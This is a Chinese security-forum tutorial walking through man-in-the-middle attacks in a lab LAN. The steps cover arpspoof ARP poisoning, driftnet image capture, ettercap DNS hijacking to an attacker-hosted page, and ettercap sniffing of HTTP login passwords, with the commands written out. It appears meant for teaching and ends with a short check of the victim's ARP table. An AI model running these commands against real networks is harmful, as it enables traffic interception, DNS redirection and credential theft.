奇安信攻防社区-中间人攻击-流量欺骗与流量劫持总结

中间人攻击-流量欺骗与流量劫持总结

无线欺骗攻击中，多数是以无线中间人攻击体现的。中间人攻击是一种“间接”的入侵攻击，是通过拦截、插入、伪造、终端数据包等各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间，这台计算机就称为“中间人”。

```php
渗透有风险，点到为止！
```

一、中间人攻击简介
=========

二、常用的欺骗工具
=========

在kali linux里面有欺骗工具包，包括Ettercap、ARPSpoof、DNSChef、SSLStrip等。

三、中间人攻击（一） -arpspoof+drifrnet实现MiTM攻击
=====================================

1、MiTM攻击简介
----------

MiTM攻击是通过劫持两个用户之间的流量来实现的，而这种流量可以通过使用Wireshark和其他数据包嗅探器等工具来监测到.。你可以在本文接下来的部分，看到Wireshark是如何对每个数据包的细节进行嗅探的，研究者们可以使用Wireshark来捕获这些数据包以供日后的详细分析。  
假设有外国政府间谍正在对一位专家的电脑进行监控，我的任务就是检查他们是否从该专家的电脑里盗取了具有图片性质的信息，比如机密地图、计划、知识产权等。这样，为了弄清事情的危害程度，我就要具体判断这些被传输的图片信息到底是什么内容。  
首先，我需要进行MitM，把自己置于攻击目标和路由器之间。这样，所有的流量我就都可以监测到了。完成MitM之后，我需要使用一个名为“driftnet”的工具,driftnet是一款用于抓取指定接口数据流上面图片的软件。这样我就能将图片信息存储并显示在我的计算机上。

2、arpspoof实施MiTM攻击
------------------

在进行MiTM的方法上，我刚开始有arpspoof和Ettercap两种选择。

ettercap是一款现有流行的网络抓包软件，它利用计算机在局域网内进行通信的ARP协议的缺陷进行攻击，在目标与服务器之间充当中间人，嗅探两者之间的数据流量，从中窃取用户的数据资料。  
而arpspoof同样也可以完成APR欺骗，在经过对比后，我发现虽然Ettercap使用起来更加简单上手，但arpspoof却更加可靠。于是最后，我决定用arpspoof实施MiTM。

### 1）信息收集

获取kali的IP地址

```php
ifconfig
192.168.200.129
```

![image-20210627224301536](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-0446af49ee5a28d4071d9664d21929da7f911e0f.png)

获取受害者IP地址

```php
ipconfig
192.168.200.134
```

![image-20210627224205774](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-0be36964e2ba24f0e2cc27f59f3ba0f0403f994d.png)

### 2）开启IP地址转发

```php
echo 1 >/proc/sys/net/ipv4/ip_forward
```

![image-20210627232423257](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-1b696e5d856a64863490bcfc9e7a92bffe5bccd4.png)

### 3) 开始欺骗

```php
arpspoof -i eth0 -t 192.168.200.134 192.168.200.1
```

![image-20210628000158308](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-a907ae8500d65d220906e9d46294c3d27d4b9d19.png)

```php
1．命令"arpspoof -i网卡 -t目标IP网关IP”的作用是将目标机数据经Kali后传给网关。
2．命令"“arpspoof -i 网关IP目标IP”的作用是将网关返回的数据经Kali后到达目标机。
```

3、driftnet接收图片
--------------

driftnet是一款简单而使用的图片捕获工具,能够捕获到网络数据包中的图片,同时支持抓取和显示音频文件,可用于捕获微信朋友圈中的相片、微博配图等等。

现在，我应该可以看到双方发送或接收的所有图片，下一步我要做的就是激活driftnet。我可以通过在Kali的任何终端输入driftnet来做到这一点，不过切记，不要使用arpspoof运行的开放终端，因为这将终止arpspoof。

如果kali没有，直接下载即可

```php
apt-get install driftnet
```

![image-20210627233957669](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-8e57e8744e1a043168aa6dae0df45c6164b4ea1e.png)

看到窗口在获取信息，这时可以打开抓取工具

```php
driftnet -i eth0 （-i 指定监听的网络接口）
```

![image-20210627234155654](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-7ec53497d56fe62fd0312376b2675da17568dfbd.png)

使用受害者电脑访问4399网站，我们在kali上抓到了图片（HTTP协议才能抓到，HTTPS抓不到）

![image-20210804144036287](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-b0ba9d0bbb1bd9564b2ec94a08b0ae453de3b7dc.png)

4、解决drifrnet无法抓取图片问题
--------------------

drifrnet无法抓取图片，这与arpspoof的命令有关

网上的教程大多是

```php
arpspoof -i 【网卡名称】 -t 【受害者IP】 【网关IP】
arpspoof -i eth0 192.168.200.134 192.168.200.2
```

这时使用wireshark抓包观察

![image-20210628003414270](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-97b8b2fad097b9ef014611edac125b4d78f37e95.png)

我们看到在kali上抓取eth0网卡的数据，筛选受害者IP，看到了抓到了受害者的流量。

可以看到,抓到的都是受害者ip (即192.168.200.134)发出的请求。所依上面的那条命令指的是，把我自己伪装成网关，局域网内的其他受害主机发出的请求报文，全部先发给我。  
那么，通过计算机网络的基础知识可知，如果想要抓取图片流，上述命令只能抓到本地上传的图片。  
如果你要抓取请求到的图片，你就不能使用上述命令。

需要改成

```php
arpspoof -i [网卡名称] -t [网关IP] [受害者IP]
arpspoof -i eth0 -t 192.168.200.1 192.168.200.134
```

问题来了，如果我即想抓取请求图片流，又想抓取响应图片流呢

```php
arpspoof -i [网卡名称] -r [网关IP] -t [受害者IP]
arpspoof -i eth0 -r 192.168.200.1 -t 192.168.200.134
```

![image-20210628005403191](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-497ae84b758e0dbc45d7b64111c0b971d60cc2ae.png)

5、永久保存操作
--------

```php
driftnet -i eth0 -b -a -d 目录
```

![image-20210628005708283](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-c3e32c09164b7f7ec16f65033f1620164fcecfee.png)

![image-20210628005744935](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-158bd94bac072929e4321768dbc04f93cd6ef0e0.png)

四、中间人攻击（二） -ARP欺骗
=================

1、流量转发
------

仅仅是截获流量，被攻击主机很容易发现异常，如何神不知鬼不觉的监视被攻击的主机呢?这就需要我们启动流量转发功能!  
进行DNS欺骗之前，要检查攻击机，有没有开启IP转发。  
Net.ipv4.ip\_forward=0，则IP转发没有开启，需要手动将其设为1。

```php
sysctl net.ipv4.ip_forward

#如果为0，使用下面命令修改为1
sysctl -w net.ipv4.ip_forward=1

或者修改此处
vi /etc/sysctl.conf
```

![image-20210628010301617](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-2f2cd8202e4cfd14dc54632ab577255f77c8c131.png)

2、开启apache服务
------------

```php
service apache2 start
```

![image-20210628230722527](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-766f164151f0d483e84d9fa8df566f4c1e3b1b8f.png)

3 、修改DNS并设计页面
-------------

1）修改便捷式ettercap中的DNS文件

```php
vi /etc/ettercap/etter.dns
```

![image-20210628231011480](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-3799e29d334c2099aca3bc0272462a0d445e872c.png)

```php
* A 192.168.200.129

"*"代表DNS劫持后指定跳转的页面，例如“*”改为www.qq.com,那么被劫持的对象访问了WWW.qq.com会跳转到192.168.200.129的apache页面上来。
“A 192.168.200.129”指的是劫持后跳转的地址信息，记住本地的eth网卡地址
```

2）设计index.html文件

该文件是网站的主页文件。可以修改原来的index.html，也可以自己写一个新的页面，替换掉之前的index.html。

![image-20210628231622410](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-1e0ba5550a3a67074c5130a8ba0c9cbc7cb699a3.png)

```php
<HTML>
<head>
<title>ARE YOU KIDDING</title>
<h1>hellow, test.....!!</h1>
<body>
SOMETHING FOR NOTHING!
</body>
</head>
</HTML>
```

测试访问index.html

```php
http://127.0.0.1/
```

![image-20210628232202029](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-c1cdf47482cfbd03ef4ac034b4a2ad7067e22da0.png)

4、启动ettercap图形界面
----------------

### 1）启动大蜘蛛

```php
ettercap -G
```

![image-20210628232419805](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-ad0b7534e0caad419eeeaa40212f7c54a3f330a1.png)

-G命令是开起GUI模式。大家不喜欢使用图形界面的话，ettercap也有命令行模式，后面我也会附上ettercap进行DNS欺骗的命令。

### 2) 配置网卡

局域网内搭建的环境，选择eth0。

![image-20210628232707420](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-74bffb8f00a4e6debb110efc2dd14ea65ad1cd0e.png)

根据实际情况选择网卡

### 3）介绍功能

确定eth0网卡，选择好网卡后点击勾就行

![image-20210628233533987](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-71c0516b0029034d7c694db3740fe1fc65cd53b3.png)

开启搜索和停止搜索

![image-20210628233732336](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-535799b378c758bb8fca09934d84736f14a2059b.png)

### 4）扫描存活主机

Host-&gt;Scan for hosts-&gt;hosts list扫描网段内的主机数量，并列出。

![image-20210628234010913](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-43e4410f7b572f31cf8f55582ffb90994a985f2b.png)

### 5）列出扫描到的主机

![image-20210628234054588](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-c83395f3adb4e6196a8af8ae021d74e36805a66c.png)

![image-20210628234105996](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-ed22ad43d24abe13014f16de8719e380457ff36c.png)

可发现存活的主机的mac和IP

### 6）添加网关和被监听的主机

选择192.168.200.134（被害者主机）后点击Add to Target1会出现：Host 192.168.200.134 Add to Target1

![image-20210629000111050](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-4b6c91bc1942981115088d28c9f76c4ddf68d221.png)

然后在选择192.168.200.2网关后点击Add to Target2 出现：Host 192.168.200.1 Add to Target2

![image-20210629000142699](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-ccec677b583cb6a8a0de3376cacf27d9ebe51dba.png)

### 7）配置arp poisoning

开启ARP毒化，选择远程嗅探连接和远程窃听

![image-20210629000235664](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-b9a13c16caf7a854765a9202e927dd9928c69500.png)

![image-20210629000257728](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-7eef5fd0aa6beb5f17bf6d30bbdf865d4f6c5c6a.png)

### 8）配置插件

Plugins-&gt;Manage plugins，然后双击dns\_spoof：劫持的意思，会弹出Activating dns\_spoof plugin... :

![image-20210628234959252](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-f7fef4c4557493d60e05f0ff6213ad8b55578d9c.png)

![image-20210629000347466](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-e63d38fa5d2ad7865619ed3c11d8dbf09053b23d.png)

### 9）成功DNS劫持

这时候不管受害者电脑访问任何http协议的网站，都会跳转到我指定的index.html界面

http协议网站

![image-20210629000703733](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-2628415e6060d78640cad64d4592fee0781dc73c.png)

HTTPS协议网站

![image-20210629000723182](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-67b1f707b964d880ecb27ea669b76cdcd19f8e97.png)

### 10）分析检查

查看受害者的arp表

![image-20210629000839008](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-21347eeebd443689b7f34486085e85b044da3314.png)

我们看到了网卡的mac地址和kali的mac地址一致，正确情况下mac地址不可能一致

ping找到劫持的IP

![image-20210629001018966](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-400aa3e8996a0bb1fef825d004bb9531c6b6b588.png)

我们看到了kali的地址，如果想停止arp劫持，关闭arpspoof窗口即可。

五、中间人攻击（三） arpspoof+Ettercap嗅探密码
================================

1、开启路由转发
--------

```php
echo 1 >/proc/sys/net/ipv4/ip_forward
```

![image-20210629001535770](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-8e772ad1fd9549d3c9674e213e4e9491d21af204.png)

利用arpspoof进行攻击欺骗

```php
arpspoof -i eth0 -t 192.168.200.134（受害者IP） 192.168.200.2 （网关）
arpspoof -i eth0 -r 192.168.200.2 -t 192.168.200.134
```

![image-20210629001840032](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-c1a45ae81e333e4ebec0658324c9255130b1b91f.png)

2、使用Ettercap进行ARP欺骗
-------------------

嗅探http登录密码

```php
ettercap -Tq -i eth0
```

![image-20210629002007914](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-0904e4fb4eb4fd5f9f196040b64132a54cf3c969.png)

3、获取浏览用户密码
----------

![image-20210629002323094](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/12/attach-80daf9284a6b358d0fa5cb11023c143d8ef3ce10.png)

六 总结
====

```php
首先介绍了什么是中间人及攻击的方式。
使用arpspoof+drifrnet工具实现劫持两个用户之间的流量来实现MiTM攻击。
截获流量，被攻击主机很容易发现异常,所用通过ettercap工具实现ARP欺骗,实现DNS劫持等攻击。
使用arpspoof+Ettercap工具嗅探密码,首先arpspoof进行攻击欺骗,再使用Ettercap进行嗅探http协议中的登录密码。
```

发表于 2021-08-09 15:12:28
阅读 ( 7009 )
分类：内网渗透

中间人攻击-流量欺骗与流量劫持总结

0 条评论